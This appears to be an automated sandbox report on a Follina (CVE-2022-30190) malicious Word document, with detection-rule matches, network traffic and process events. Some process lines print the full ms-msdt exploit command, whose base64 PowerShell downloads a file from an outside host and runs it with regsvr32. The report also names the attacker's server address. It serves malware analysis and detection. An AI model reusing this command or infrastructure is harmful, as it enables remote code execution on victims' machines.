Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://tasks.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://wus2.contentsync.
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: global traffic HTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.32.185.177Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.32.185.177If-Modified-Since: Tue, 07 Jun 2022 13:20:09 GMTIf-None-Match: "1701-5e0db72a43821"Connection: Keep-Alive
Source: DiagPackage.dll.mui.9.dr Static PE information: No import functions for PE file found
Source: DiagPackage.dll.9.dr Static PE information: No import functions for PE file found
Source: 00000009.00000002.729808859.0000000002830000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: 00000009.00000002.729847278.0000000002838000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: 00000009.00000002.729643897.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: 00000009.00000002.730773001.0000000002AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: Process Memory Space: msdt.exe PID: 6552, type: MEMORYSTR Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, type: DROPPED Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1FD46902.htm, type: DROPPED Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7F7F7060.htm, type: DROPPED Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: DiagPackage.dll.9.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagPackage.dll.9.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagPackage.dll.9.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: doc1712.docx Virustotal: Detection: 23%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYQBsAHMALQBvAG4AbABpAG4AZQAuAG8AcgBnAC8ASgBRAFcAagA3ADgALwBZAC4AcABuAGcAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIAOwByAGUAZwBzAHYAcgAzADIAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qe5jzpda\qe5jzpda.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374A.tmp" "c:\Users\user\AppData\Local\Temp\qe5jzpda\CSC4563D2ED18334995B732DDC516AA1E81.TMP"
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwo13jpt\xwo13jpt.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C97.tmp" "c:\Users\user\AppData\Local\Temp\xwo13jpt\CSC9D13466D68BE46EAAB5DAAD8B4EDFE4C.TMP"
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\Fros.poster
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ddzr0cba\ddzr0cba.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CD.tmp" "c:\Users\user\AppData\Local\Temp\ddzr0cba\CSC44E4BCADDF3245FBA3B96135AF703040.TMP"
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYQBsAHMALQBvAG4AbABpAG4AZQAuAG8AcgBnAC8ASgBRAFcAagA3ADgALwBZAC4AcABuAGcAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIAOwByAGUAZwBzAHYAcgAzADIAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374A.tmp" "c:\Users\user\AppData\Local\Temp\qe5jzpda\CSC4563D2ED18334995B732DDC516AA1E81.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C97.tmp" "c:\Users\user\AppData\Local\Temp\xwo13jpt\CSC9D13466D68BE46EAAB5DAAD8B4EDFE4C.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CD.tmp" "c:\Users\user\AppData\Local\Temp\ddzr0cba\CSC44E4BCADDF3245FBA3B96135AF703040.TMP" Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32 Jump to behavior
Source: doc1712.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\doc1712.docx
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{2CAA8033-7991-4565-AB80-E2DDAE691AB0} - OProcSessId.dat Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini Jump to behavior
Source: classification engine Classification label: mal72.expl.evad.winDOCX@17/32@0/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\msdt.exe File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qe5jzpda\qe5jzpda.cmdline
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwo13jpt\xwo13jpt.cmdline
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ddzr0cba\ddzr0cba.cmdline

Persistence and Installation Behavior

barindex
Source: document.xml.rels Extracted files from sample: mhtml:http://45.32.185.177:80/123.res!http://45.32.185.177:80/123.res
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ddzr0cba\ddzr0cba.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\DiagPackage.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\xwo13jpt\xwo13jpt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\en-US\DiagPackage.dll.mui Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\qe5jzpda\qe5jzpda.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\DiagPackage.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\en-US\DiagPackage.dll.mui Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
